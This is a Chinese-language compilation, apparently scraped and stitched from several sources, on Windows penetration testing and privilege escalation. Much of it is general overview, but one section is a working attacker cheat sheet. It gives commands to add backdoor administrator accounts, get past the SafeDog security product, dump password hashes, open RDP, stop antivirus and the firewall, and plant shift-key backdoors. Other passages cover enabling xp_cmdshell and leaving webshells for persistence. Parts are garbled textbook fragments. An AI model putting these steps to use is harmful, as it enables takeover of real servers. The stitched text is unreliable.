Windows渗透与提权技巧汇总
windows提权方法
windows提权方法Windows提权方法是指攻击者通过一系列技术手段,使自己的权限从普通用户提升到管理员或系统权限,从而能够进一步控制被攻击的Windows系统。
这是黑客和安全研究人员常用的一种攻击手段,在实际应用中也有一定的危害性。
下面我们将为大家介绍一些常见的Windows提权方法。
1.本地提权本地提权是指攻击者在本地计算机上进行的一些提权方式,通常利用了Windows操作系统本身的漏洞或安全配置问题,实现自己权限的提升。
以下是一些常见的本地提权方式:(1)利用服务漏洞提权。
攻击者通过利用服务漏洞(如RpcSs、webclient等)的缓冲区溢出问题,成功提升自己的权限。
(2)利用系统补丁问题提权。
攻击者在已经安装了特定版本系统补丁的计算机上,通过利用补丁所覆盖的漏洞,成功提升自己的权限。
(3)利用运行文件权限提权。
攻击者通过更改某些文件的访问权限,实现自己的权限提升。
例如:修改某个可执行文件,让该文件在运行时以管理员身份运行。
2.网络提权网络提权是指攻击者通过利用Windows操作系统中的漏洞,在网络中的其他计算机上进行提权的方式。
以下是一些常见的网络提权方式:(1)利用扫描器提权。
攻击者通过扫描网络上存在的系统漏洞,从而成功提高自己的权限。
(2)利用远程漏洞提权。
攻击者利用Windows操作系统中的远程漏洞(如SMB连接漏洞等),在远程计算机上执行提升权限的攻击。
(3)利用跨站点脚本攻击提权。
攻击者在网络应用程序中利用跨站点脚本漏洞,突破用户权限,提高自己的访问权限。
总体来说,Windows提权方法属于黑客攻击利用的一种手段,但也有些情况下确实有些必要。
我们建议使用此技巧属于技术研究范畴,不要用来进行不道德或非法的活动。
同时,我们也建议用户加强自身系统的安全性,及时升级补丁并且保持杀毒软件的更新,这几项措施可以一定程度地保障系统安全。
常见提权方法
常见提权方法1. 用户提权:用户提权是指普通用户通过某种方式获取管理员权限或超级用户权限的行为。
常见的用户提权方法包括:利用弱密码、使用系统漏洞、利用特权提升程序等。
详细描述:用户提权是黑客经常使用的一种手段,通过获取管理员权限,黑客可以执行更高级别的操作,如修改系统配置、访问敏感文件等。
利用弱密码是最常见的用户提权方法之一。
黑客可以使用密码破解工具或暴力破解技术尝试猜解用户密码,一旦成功登录系统,就可以获取管理员权限。
系统漏洞也是用户提权的常见方法之一。
黑客可以通过渗透测试或漏洞扫描等方式发现系统中的漏洞,然后利用这些漏洞获取管理员权限。
某个系统可能存在一个未修补的漏洞,黑客可以利用这个漏洞上传特制的脚本,从而获得系统的控制权。
黑客还可以利用特权提升程序来提权。
这些程序的功能是在受限的用户权限下执行特权操作,如创建新用户、修改用户组等。
黑客可以通过执行这些特权提升程序来获取管理员权限,从而获得系统的完全控制权。
2. 命令注入:命令注入是指黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
常见的命令注入方法包括:通过修改URL参数、利用操作系统命令执行漏洞等。
详细描述:命令注入是一种常见的网络攻击手法,黑客通过在输入框或URL参数中注入恶意命令,从而执行非授权的操作。
黑客可以在一个搜索框中输入特定的字符串,以执行系统命令,或是通过改变URL参数来获取系统权限。
命令注入通常利用了操作系统的命令执行漏洞。
当用户传递的输入被直接用于构造系统命令时,如果没有正确进行输入验证和过滤,黑客就可以通过构造恶意输入来执行非授权的操作。
这种攻击方式在许多Web应用程序中非常常见,如论坛、博客等。
为了防止命令注入攻击,开发者应该始终对用户输入进行适当的验证和过滤。
可以使用特定的字符过滤器来禁止或转义危险的字符,或是通过使用参数化查询和预编译语句等方式防止SQL注入。
3. 文件包含漏洞:文件包含漏洞是指黑客通过利用应用程序中的文件包含功能来执行恶意代码。
网络渗透测试实践经验分享
网络渗透测试实践经验分享网络渗透测试是现在信息安全领域非常重要的一个环节,通过模拟黑客攻击的方式,评估网络的安全性,发现并修补网络漏洞。
作为一名网络安全从业人员,我在多次网络渗透测试实践中积累了一些经验,分享给大家。
1. 收集情报在进行渗透测试之前,需要先进行收集情报的工作,了解目标的 IP 地址、系统类型、开放的端口、CMS 程序、社会工程学信息等等,这些信息对于后续的攻击行为非常重要,可以通过开源情报收集工具,如the harvester、nmap等等收集,也可以通过搜索引擎和社交网络进行信息搜集。
2. 识别漏洞在收集信息的基础上,需要进行漏洞识别。
漏洞识别可以使用工具,如 Nessus、OpenVAS、Metasploit 等等,也可以手动进行测试。
执行端口扫描,识别出正在运行的服务及对应端口号,在确定了服务以及相应的版本之后,可以通过漏洞库进行漏洞比对,根据提示进行手动测试。
3. 信息搜集攻击者想要获得授权进入网络和系统,首先需要获取登录凭据。
在获取了操作系统和软件的版本信息之后,可以找到对应的漏洞,以获取管理员凭证。
可以使用工具进行社会工程学攻击,如Phishing、Spear Phishing 等等。
4. 提权在获取到特权用户的凭据之后,想要进一步进入系统,需要提权。
在 Windows 系统下,可以使用 Meterpreter 获取 Administrator 权限;在 Linux 系统下,则可以通过 su、sudo 等方式获取 ROOT权限。
提权过程中需要注意操作,防止路径穿越漏洞等导致系统奔溃或数据丢失。
5. 遗留成功拿到管理员凭据后,攻击者为了长期控制此网站,会留下木马以逃避监管。
有很多后门工具可以选择,让黑客可以稳定的控制被攻击机器。
使用一些常见的后门工具,如Trojan、Netcat、WebShell 等等。
6. 报告生成最后,需要将发现的安全问题进行总结,并形成详细的渗透测试报告,包括测试目的、测试范围、测试过程、测试结果、安全风险等内容。
缓冲区溢出实现渗透入侵和提权
一个缓冲区溢出简单实例
这里以在Windows XP SP3操作系统环境下进行介绍,产生缓冲区溢出的过程如下: 步骤1:在Windows操作系统【运行】对话框“打开”文本框中输入“cmd”命令,即可
打开【命令提示符】窗口,如图6-1所示。这是Windows系统自带的命令行工具,可 执行各种内置的命令程序。 步骤2:在【命令提示符】窗口之中执行dir命令,即可看到在【命令提示符】窗口之 中显示了系统目录中的所有文件、目录及相关信息,如图6-2所示。
RPC服务远程溢出漏洞攻击
对DCOM接口进行相应的配置,具体的操作步骤如下: 步骤3:选择“位置”选项卡,在打开的设置对话框对DirectAccess Class对象进行位
置的设置,如图6-47所示。选择“安全”选项卡,在打开的设置对话框中对 DirectAccess Class对象进行启动和激活权限、访问权限和配置权限进行设置,如 图6-48所示。
一个缓冲区溢出简单实例
这里以在Windows XP SP3操作系统环境下进行介绍,产生缓冲区溢出的过程如下: 步骤3:dir命令还可以指定列表显示的路径,在【命令提示符】窗口之中输入命令
“dir c:\”,即可显示C盘根目录下的文件以及目录信息,如图6-3所示。 步骤4:如果在【命令提示符】窗口之中指定一个不存在的路径,即可显示“系统找不
本章结束,谢谢观赏
6-94所示。如果目标代理服务器是处于CCProxy的免密码状态,就会出现Banner信 息“CCProxy Telnet Server Ready”,如图6-95所示。 步骤2:如果目标代理服务器是处于CCProxy密码状态,即设置过代理用户名和密码, 则会提示输入用户名,随意输入几个字符,将会出现错误提示“User Invalid”, 如图6-96所示。这些信息都是CCProxy特有提示信息,可轻松确定目标代理服务器 是否安装了CCProxy。
msf对windows提权方法总结
Metasploit Framework(MSF)是一种渗透测试工具,它包括了许多模块和利用技术,其中一些专门用于在 Windows 系统上进行提权。
提权是指攻击者通过某种手
段获取更高权限的过程,通常是从普通用户升级为管理员或系统用户。
以下是一些在 Metasploit 中用于 Windows 提权的常见方法:
1.Local Exploits:
Metasploit 提供了一些本地漏洞利用模块,用于利用目标系统上的已知漏洞。
这些模块可能涉及到某些服务或应用程序的漏洞,通过这些漏洞攻击者可以
获得更高的权限。
例如:
2.Post Exploitation Modules:
Metasploit 还提供了一些用于后期渗透的模块,用于在系统上查找提权的机
会。
这些模块通常在获取初始访问权限后运行,以寻找系统中的漏洞或弱点。
例如:
3.Token Impersonation:
在 Windows 中,通过令牌伪造(Token Impersonation)技术,攻击者可以使
用已经获得的令牌来获取更高的权限。
Metasploit 提供了一些与令牌相关的
模块,用于伪造或注入令牌。
例如:
4.Exploit Suggester:
Metasploit 中的post/multi/recon/local_exploit_suggester模块用于自动检测目标系统上可能存在的提权机会。
它会分析系统信息,查找可能的本地漏洞,然后建议相应的模块。
这些只是 Metasploit 中一些常见的 Windows 提权方法,实际使用时需要根据目标系统的具体情况选择适当的模块。
渗透测试资料--提权技巧
### 提权技巧1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.txt cmd.rar等 user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上传一个net.exe3.cmd执行exp没回显的解决方法:com路径那里输入exp路径C:\RECYCLER\pr.exe,命令那里清空(包括/c )输入net user jianmei daxia/add4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如PwDump7.exe,得到hash之后可以进行破解,建议重定向结果到保存为1.txtcmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在条件允许的情况下也可以用mimikatz直接抓明文5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考虑是不是因为密码过于简单或是过于复杂了6.用wt.asp扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输入替换的文件路径,下面清空双引号加增加用户的命令7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名了,使用命令net user administrator查看管理组的名字8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:\xxx\exp.exe whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那里,下面不变9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setpc:\windows\temp\cmd.exe 设置终端路径为:c:\windows\temp\cmd.exe11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网站目录,找到主站的目录就可以跨过去了,上传cscript.exe到可执行目录,接着上传iispwd.vbs到网站根目录,cmd命令cmd /c“c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs11.如何辨别服务器是不是内网?192.168.x.x 172.16.x.x 10.x.x.x12.安全狗下加用户的语句::for /l %i in (1,1,1000) do @net user testtest [/add&@net]() localgroup administrators test /add13.21对应的FTP、1433对应的MSSQL、3306对应的MYSQL、3389对应的远程桌面、1521对应的Oracle、5631对应的pcanywhere14.劫持提权,说到这个,想必肯定会想到lpk.dll这类工具,有时候在蛋疼怎么都加不上账户的时候,可以试试劫持shift、添加开机启动等等思路15.提权成功但3389端口没开,执行语句或是工具开3389失败的时候,可以上传rootkit.asp,登陆进去就是system权限,这时候再尝试开3389希望较大### 常用DOS命令查看版本:ver查看权限:whoami查看配置:systeminfo查看用户:net user查看进程:tasklist查看正在运行的服务:tasklist /svc查看开放的所有端口:netstat -ano查询管理用户名:query user查看搭建环境:ftp 127.0.0.1查看指定服务的路径:sc qc Mysql添加一个用户:net user jianmei daxia.asd /add提升到管理权限:net localgroup administrators jianmei /add添加用户并提升权限:net user jianmei daxia.asd /add & net localgroup administrators jianmei /add查看制定用户信息:net user jianmei查看所有管理权限的用户:net localgroup administrators加入远程桌面用户组:net localgroup “Remote Desktop Users” jianmei /add 突破最大连接数:mstsc /admin /v:127.0.0.1删除用户:net user jianmei /del删除管理员账户:net user administrator daxia.asd更改系统登陆密码:net password daxia.asd激活GUEST用户:net user guest /active:yes开启TELNET服务:net start telnet关闭麦咖啡:net stop “McAfee McShield”关闭防火墙:net stop sharedaccess查看当前目录的所有文件:dir c:\windows\查看制定文件的内容:type c:\windows\1.asp把cmd.exe复制到c:\windows的temp目录下并命名为cmd.txt:copyc:\windows\temp\cookies\cmd.exe c:\windows\temp\cmd.txt开3389端口的命令:REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f查看补丁:dir c:\windows\>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.logKB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log)do @type [a.txt|@find](mailto:a.txt%7C@find) /i [“%i”||@echo] (mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /a a.txt### 常见杀软360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe 金山卫士McAfee McShield.exe 麦咖啡SafeDogUpdateCenter.exe 服务器安全狗### windows提权中敏感目录和敏感注册表的利用敏感目录目录权限提权用途C:\Program Files\默认用户组users对该目录拥有查看权可以查看服务器安装的应用软件C:\Documents and Settings\All Users\「开始」菜单\程序 Everyone拥有查看权限存放快捷方式,可以下载文件,属性查看安装路径C:\Documents and Settings\All Users\Documents Everyone完全控制权限上传执行cmd及expC:\windows\system32\inetsrv\ Everyone完全控制权限上传执行cmd及expC:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini默认用户组users拥有查看权限安装mysql时会将root密码写入该文件C:\windows\system32\默认用户组users拥有查看权限 Shift后门一般在该文件夹,可以下载后门破解密码C:\Documents and Settings\All Users\「开始」菜单\程序\启动 Everyone拥有查看权限可以尝试向该目录写入vbs或bat,服务器重启后运行C:\RECYCLER\D:\RECYCLER\ Everyone完全控制权限回收站目录。
常见提权方法(一)
常见提权方法(一)常见提权方法1. 操作系统提权•提权漏洞利用:利用操作系统中已知的提权漏洞来获取系统权限,常见的漏洞包括文件权限配置错误、缓冲区溢出、逻辑漏洞等。
•拓展权限:利用操作系统提供的一些特殊权限或命令,如suid、sgid、sudo等,来获取临时的特权身份。
2. 应用程序提权•应用程序漏洞利用:利用应用程序中存在的漏洞,如SQL注入、远程代码执行、文件上传等,通过攻击者构造恶意数据或代码,来提升自己的权限。
•提权脚本/工具:使用已存在的提权脚本或工具,如Metasploit、MSFvenom等,来快速提升应用程序权限。
3. 身份伪装提权•社会工程学攻击:通过伪装成合法用户、管理员或其他高权限身份,诱导目标用户提供权限,如通过钓鱼邮件、伪装网站等手段。
•口令猜测/破解:对目标系统、应用程序的口令进行暴力猜测或使用破解工具,如字典攻击、暴力破解等。
•弱口令:对系统、应用程序等的默认账号密码或弱口令进行攻击,如admin/admin、123456等常见弱口令。
•配置错误利用:利用系统或应用程序配置错误,如未及时更新软件、未关闭不必要的服务等,从而获得系统权限。
5. 特殊设备提权•物理入侵:通过实际接触目标设备,如服务器、路由器等,进行操作,获取管理权限。
•设备漏洞利用:利用特殊设备(如网络摄像头、智能家居等)存在的漏洞,进行远程攻击,获取设备权限。
以上是常见的提权方法,在进行安全防护时,需要注意及时更新系统和应用程序、配置合理的权限控制、使用强密码、定期进行安全审计等,以有效防范提权攻击的发生。
6. 物理设备提权•USB攻击:通过携带恶意的USB设备,如USB键盘模拟器、USB 存储设备等,来获取目标设备的权限。
•直接访问:通过直接访问目标设备的控制台或终端,如服务器、交换机等,进行非法操作,获取设备权限。
•中间人攻击:通过在网络通信过程中劫持、篡改或窃取数据,获取目标系统或应用程序的权限。
常见的提权方法
常见的提权方法1. 提权方法之一是利用弱密码。
当系统或应用程序使用弱密码进行身份验证时,攻击者可以使用字典攻击、暴力破解或社交工程等技术来猜解密码并获取管理员权限。
2. 通过漏洞利用来提权也是一种常见的方法。
攻击者可以利用系统、应用程序或服务的安全漏洞,通过代码注入、缓冲区溢出等技术来获取提权权限。
3. 通过系统配置错误来提权。
攻击者可以利用系统管理员在配置文件、访问控制列表或权限设置等方面的错误来获得更高的权限。
4. 利用恶意软件进行提权也是一种常见的方法。
攻击者可以通过植入恶意软件、后门程序或恶意脚本等方式,在受害者计算机上运行,并以管理员权限执行特定操作。
5. 通过内核提权也是一种常见的方法。
攻击者可以利用操作系统内核的漏洞,通过缓冲区溢出、内存损坏或环境变量篡改等技术来获取提权权限。
6. 利用特权升级工具进行提权是另一种常见的方法。
这些工具包括Metasploit、Backtrack、Kali Linux等,它们提供了各种漏洞利用和提权的功能。
7. 利用附加权限漏洞进行提权。
当系统或应用程序授予某些用户或组额外的特权时,攻击者可以利用这些漏洞来获取提权权限。
8. 通过利用网络服务进行提权。
一些网络服务存在软件或配置漏洞,攻击者可以通过这些漏洞利用来获取提权权限。
9. 利用操作系统的弱点进行提权。
操作系统中可能存在一些安全性较弱的功能或配置,攻击者可以利用这些弱点来获取管理员权限。
10. 攻击者还可以通过社交工程和伪造身份来获取提权权限。
他们可能通过欺骗或说服其他用户来获得管理员权限,或者利用钓鱼等技术获取管理员凭据。
最全Windows提权总结(建议收藏)
最全Windows提权总结(建议收藏)当以低权⽤户进去⼀个陌⽣的windows机器后,⽆论是提权还是后续做什么,第⼀步肯定要尽可能的搜集信息。
知⼰知彼,才百战不殆。
常规信息搜集systeminfo 查询系统信息hostname 主机名net user 查看⽤户信息netstat -ano|find "3389" 查看服务pid号wmic os get caption 查看系统名wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息wmic product get name,version 查看当前安装程序wmic service list brief 查询本机服务wmic process list brief 查询本机进程net share 查看本机共享列表netsh firewall show config 查看防⽕墙配置常见的杀软如下:360sd.exe 360杀毒360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe ⾦⼭卫⼠SafeDogUpdateCenter.exe 安全狗McAfee McShield.exe McAfeeegui.exe NOD32AVP.exe 卡巴斯基avguard.exe ⼩红伞bdagent.exe BitDefender要搜集的信息⼤致如下⼏点:机器的系统及其版本机器的打补丁情况机器安装的服务机器的防⽕墙策略配置机器的防护软件情况提权简介提权可分为纵向提权与横向提权:纵向提权:低权限⾓⾊获得⾼权限⾓⾊的权限;横向提权:获取同级别⾓⾊的权限。
Windows常⽤的提权⽅法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略⾸选项提权、WEB中间件漏洞提权、DLL劫持提权、滥⽤⾼危权限令牌提权、第三⽅软件/服务提权等1、系统内核溢出漏洞提权#⼿⼯查找补丁情况systeminfo查看补丁wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息#MSF后渗透扫描post/windows/gather/enum_patches利⽤(Vulmap、Wes、WindowsVulnScan)对⽐补丁进⽽进⾏提权2、at命令利⽤在Windows2000、Windows 2003、Windows XP 这三类系统中,我们可以使⽤at命令将权限提升⾄system权限。
渗透技巧总结
渗透技巧总结渗透测试是一种通过模拟黑客攻击的方式来评估计算机系统、网络系统、应用程序等信息系统的安全性和防御能力。
在进行渗透测试时,渗透测试人员需要运用一系列的技巧和工具来获取系统的信息、发现潜在的安全漏洞,并进一步利用这些漏洞进行渗透攻击。
下面将从信息收集、漏洞扫描、攻击技术等方面总结渗透测试中常用的技巧。
一、信息收集1. 主机发现:利用网络扫描工具(如Nmap)对目标主机进行扫描,获取主机的IP地址、开放端口等信息。
2. 网络拓扑发现:使用工具(如NetStat、Wireshark)分析目标网络的拓扑结构,了解网络设备、子网等信息。
3. 网站信息收集:通过搜索引擎、Whois查询等方式获取目标网站的域名信息、服务器信息等。
4. 社交工程:通过社交媒体、员工信息等途径,获取目标组织的人员、部门等相关信息。
二、漏洞扫描1. 漏洞扫描工具:使用工具(如Nessus、OpenVAS)对目标系统进行漏洞扫描,识别系统中存在的漏洞。
2. Web应用扫描:利用工具(如Burp Suite、Acunetix)对Web应用程序进行扫描,发现可能存在的Web漏洞。
3. 操作系统漏洞利用:通过利用已知的操作系统漏洞(如MS08-067)来实现对目标系统的攻击。
三、攻击技术1. 社会工程学:通过钓鱼邮件、钓鱼网站等方式诱导目标用户点击恶意链接、下载恶意文件。
2. 密码破解:利用暴力破解、字典攻击等方式对目标系统的口令进行破解。
3. 缓冲区溢出:利用溢出漏洞向目标系统注入恶意代码,执行攻击代码。
4. 水坑攻击:通过植入木马等恶意程序,监视目标用户的行为并获取信息。
总结:渗透测试需要渗透测试人员具备扎实的网络知识、熟练运用各种渗透测试工具,并且具备良好的逻辑分析能力和创新思维。
渗透测试人员在进行渗透攻击时必须遵守法律法规,不得违法行为。
在进行渗透测试时,需事先获得目标系统所有者的授权,并在攻击中避免对目标系统造成损害。
内网渗透测试思路
写在前面跟web渗透(上一篇)不同,内网渗透需要更多的随机性和突破口,情况较为复杂,遇到障碍,有时可以换种思路突破,很多时候则无奈的只能止步于此。
下面分享一些自己总结的内网渗透经验。
主要是以windows下的操作为主。
0×01 斗转星移(在拿到webshell的时候,想办法获取系统信息拿到系统权限)一、通过常规web渗透,已经拿到webshell。
那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接。
① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行探测的。
I: 不具备系统权限:① Serv-U提权,现在很多的webshell都集成了Serv-U一键提权功能,只需要点击一下就拥有了系统权限,简单快速。
② SQL Server提权,利用webshell的目录翻阅功能,查找网站根目录下的数据库配置文件,以php为例则为config.php;查看文件内容一般都会发现数据库的登陆信息用户名/密码,(密码md5或者其他的加密方式解密一下即可),通过webshell或者数据库端口开放的话利用数据库连接工具Navicat等工具来连接数据库。
连接数据库检查xp_cmdshell是否存在,扩展存储过程是否打开,再利用xp_cmdshell来执行系统命令,添加用户、开启远程桌面等。
常用命令:select count(*) from master.dbo.sysobjectswhere xtype = ‘x’ and nam e=’xp_cmdshell’返回值是1就是有xp_cmdshell存储过程exec master.dbo.sp_addextendedproc ‘xp_cmdshell’,’xplog70.dll ’添加cmdshell(Sqlserver 2000)exec sp_configure ‘show advanced options’,1;当设置advanced options参数为1时,系统才允许修改高级选项;reconfigure;exec sp_configure ‘xp_cmdshell’,1;开启扩展存储过程;reconfigure; (Sqlserver 2005)通过xp_cmdshell来执行命令:exec master.dbo.xp_cmdshell ‘命令’③ MYSQL提权,如SQL Server一样,首先找到数据库连接文件来找到数据库的登陆信息,登陆MYSQL数据库,利用MYSQL的Create Function来添加自定义函数,向mysql添加命令执行函数来执行系统命令。
Windows权限提升—溢出提权
Windows权限提升—溢出提权溢出提权是一种常用的 Windows 权限提升技术,它利用程序漏洞,通过恶意代码注入来实现提升权限,使攻击者可以执行更高权限的操作。
本文将简要介绍溢出提权的基本原理和实现方法。
溢出提权的基本原理在 Windows 系统中,每个操作都会为系统分配一定的权限。
管理员帐户拥有最高权限,普通用户帐户只能访问自己的目录和文件。
当用户使用一个程序时,它的进程也会被分配相应的权限。
通常情况下,进程只能访问自己的资源,而不能访问其他权限限制更高的资源。
但是,如果程序存在漏洞,则攻击者可以利用这种漏洞和缺陷实现对Windows 系统的管理和控制。
其中,DLL 劫持和缓冲区溢出是常用的漏洞攻击方式。
DLL劫持是指攻击者将恶意 DLL 文件注入到进程中,从而绕过Windows 系统的安全检测,执行恶意行为。
而缓冲区溢出则是利用程序缓冲区的限制,通过向程序输入数据的方式,迫使程序发生异常而实现控制权转移或程序崩溃,从而执行恶意代码。
这两种攻击方式都可以达到提升权限的目的。
实现方法实现溢出提权的基本步骤如下:1. 寻找目标程序的漏洞,通常可在互联网上找到已经公开的漏洞信息。
2. 通过编写恶意代码,利用漏洞注入到目标程序中。
3. 利用注入的恶意代码,执行提权相关操作。
在实际操作过程中,还需要考虑如何在 Windows 系统中寻找漏洞、如何编写恶意代码、如何注入恶意代码等技术问题。
总结溢出提权是一种常用的 Windows 权限提升技术,攻击者可以通过利用漏洞和缺陷实现对 Windows 系统的控制和管理,达到提权的目的。
为了避免被溢出提权攻击,用户可以采取多种安全措施,如加强系统防护、不随意下载未知的软件和程序、定期更新系统及装备有效的杀毒软件等。
缓冲区溢出攻击曾经是一种常见的攻击方式,在过去的多年里,它成功地被用来打败了无数的网络安全措施。
有很多的案例证明了缓冲区溢出攻击的可行性和危害性。
下面将简要介绍一些缓冲区溢出攻击的知名案例。
Windows提权小结
Windows提权⼩结摸鱼的时候,想想内⽹这部分还有什么地⽅适合⽔⼀下,翻翻往期,开始填坑总结⼀下Windows提权的部分,以后有时间再补⼀下Linux提权这仍然是⼀篇思路总结类的随笔,具体细节内容不展开,也展开不了......欢迎去各⼤社区学习⼤佬们的操作关于第三⽅提权以后再说0x00前⾔常见的Windows权限有三种:user administrator system (当然还有其他的)administrator管理员权限是⽐较⾼的,但是如果涉及到读取系统⽂件,还是要靠system权限和web提权⼀样,Windows提权也可以分成横向提权和纵向提权,实际上那些可利⽤的⽅法默认都是纵向提权,即从低权限到⾼权限Windows提权的分类⽅法呢,也是五花⼋门的当然可以利⽤第三⽅漏洞进⾏提权,⽐如各种数据库提权,但我觉得这部分不好划分到Windows系统提权这边⼉,有些乱,就分到数据库提权的专题了那以后有机会整理下数据库提权的内容......0x01 系统内核溢出漏洞提权第⼀种要介绍的提权办法就是这个溢出漏洞提权,如果⽬标机器没有打相应的补丁,就可以利⽤(啊之所以把它放在第⼀个并不是说优先级最⾼,并不推荐优先考虑内核溢出漏洞)⾸先要收集⼀下⽬标系统的信息whoami /groups如果像图中⼀样,看到是medium权限,就想想如何提升到high执⾏命令,查看安装了哪些补丁,或者systeminfo找到相应的提权漏洞,且没打过补丁,可以利⽤相应的exp就好了找了⼏个Windows提权exp整理链接,是否可⽤需要⼤家⾃⾏测试判断,有更全的欢迎评论补充(话说我忘记我电脑⾥的exp都是哪⾥下载的。
)于是问题转变成了:怎么去根据缺少的补丁去找exp?或者说怎么去找缺失的补丁?(1)msfmsf中存在post/windows/gather/enum_patches模块最好是在meterpreter中run post/windows/gather/enum_patches 这个脚本就能列出⽬标机器补丁及利⽤情况当然,结果仅供参考(2)wes全名:Windows exploit suggester⼀款很有名的,适⽤于Windows系统的⼯具,⽤于⽐较补丁存在情况,提供相关提权漏洞信息但是这个玩意是个py,需要有py环境,不过这个不算啥问题它需要把⽬标系统systeminfo的信息导⼊⼀个txt⽂件,再把这个txt⽂件拖回攻击者本机,在攻击者本机上执⾏相关脚本加以判断。
渗透测试工具的使用方法与技巧
渗透测试工具的使用方法与技巧渗透测试是一种评估系统安全的方法,通过模拟攻击来发现潜在的安全漏洞。
而渗透测试工具则是渗透测试人员必备的利器,它们能够帮助渗透测试人员更高效地发现漏洞和弱点。
本文将介绍几种常用的渗透测试工具以及它们的使用方法和技巧。
1. Nmap:Nmap是一款强大的网络扫描工具,它能够发现网络上的主机和开放的端口,并获得相关的操作系统和服务信息。
使用Nmap时,可以通过以下命令进行快速扫描:```nmap -sP <目标IP段> # 扫描IP段上的存活主机nmap -p <端口号> <目标IP> # 扫描指定主机上的指定端口nmap -O <目标IP> # 进行操作系统识别```此外,Nmap还提供了一些高级功能,例如脚本扫描和漏洞检测。
通过脚本扫描,可以自动化执行一系列的Nmap脚本来对目标进行全面检测。
2. Metasploit:Metasploit是一款用于漏洞利用和渗透测试的框架,它集成了大量的漏洞模块和攻击工具。
Metasploit使用模块化的方式来进行攻击和渗透测试,用户可以选择合适的模块来执行特定的攻击。
以下是一些常用的Metasploit命令:```use <模块名称> # 使用指定的模块set <选项名称> <值> # 设置模块的参数exploit # 执行攻击```Metasploit还提供了一个强大的Payload生成器,使用者可以根据需要生成各种类型的Payload,例如远程命令执行、提权、反弹Shell等。
在使用Metasploit时,要注意遵守法律和道德规范,仅用于合法的渗透测试和授权的安全评估。
3. Burp Suite:Burp Suite是一款用于Web应用程序渗透测试的综合性工具套件。
它包含了代理、扫描器、爬虫、隧道等多个模块,能够全面检测和评估Web应用程序的安全性。
总结16种网站渗透技巧经验分享
总结16种⽹站渗透技巧经验分享1.利⽤⽹站过滤不严直接绕过后台验证,在⽹站后⾯加上 admin/session.asp 或 admin/left.asp2.有的⽹站进后台会出现⼀个脚本提⽰框,输⼊:administrator 即可突破!因为admin代表以管理员⾝份进⼊的意思。
3.有的⽹站开了3389,⼊侵之前先去连接3389,尝试弱⼝令或是爆破,再者就是按5次shift键,看看有没前⼈装过后门,然后再社⼯密码。
4.有时候进后台会弹出提⽰框“请登陆”,把地址抄写出来(复制不了),然后放在⽹页源代码分析器⾥,选择浏览器-拦截跳转勾选–查看即可进⼊后台!6.突破⼀流信息监控拦截系统访问,当⼩马可以访问,上传⼤马却不⾏的时候,可以先⽤⼤马跟⼀张图⽚合并,在上传合并后的图⽚,接着数据库备份后访问即可!7.在拿编辑器的shell时,有时增加了asp|asa|cer|php|aspx等扩展名上传时都被过滤了,其实只要增加aaspsp 上传asp就会突破了。
8.有时啊D猜出表段了,但是猜不到字段的时候,可以到后台查看源⽂件,搜索ID或type,⼀般都能找到,再到啊D⾥添加字段进⾏猜解内容即可突破。
9.社⼯后台密码可以⽤这个技巧,假如⽹站域名是: 管理员名称为admin,可以试试密码“baidu”和“”来登陆。
10.⼿⼯注⼊时如果⽹站过滤了 and 1=1 and 1=2 ,可以⽤xor 1=1 xor 1=2 进⾏判断。
11.本地构造上传⼀句话⽊马,如果提⽰“请先选择你要上传的⽂件![ 重新上传 ]” ,说明⽂件太⼩了,⽤记事本打开再复制多⼏句话从⽽扩⼤⽂件⼤⼩,再上传即可。
12.⽤啊d跑表,跑字段名name和pass出不来,显⽰长度超过50什么的,猜解不出的情况下,这时放在穿⼭甲去跑⼀般都能跑出来!13.猜管理员后台⼩技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 会现出菜单导航,然后迅雷下载全部链接。
渗透测试运用技巧
渗透测试运用技巧渗透测试是指通过模拟黑客攻击的方式,对目标系统进行全面、系统、深入的安全评估和漏洞发现的过程。
以下是一些常用的渗透测试技巧:1.信息收集:在进行渗透测试之前,进行详细的信息收集是必要的。
这包括目标系统的IP地址、域名信息、子域名、开放端口、网络架构、应用程序等等。
通过使用开源情报(OSINT)工具和技术,可以收集到有关目标的大量信息。
2.漏洞扫描:漏洞扫描是确定目标系统存在哪些已知的安全漏洞的过程。
通过使用扫描工具,如Nessus、OpenVAS等,可以自动化地扫描目标系统,并列出可能存在的漏洞。
3.密码破解:密码破解是指尝试使用各种方法来获取系统中存在的弱密码或默认凭证。
这可能包括使用暴力破解、字典攻击、社交工程等技术。
通过密码破解,渗透测试人员可以获取未授权的访问权限。
5.应用程序漏洞利用:应用程序常常存在各种安全漏洞,如跨站脚本攻击(XSS)、SQL注入、文件包含等。
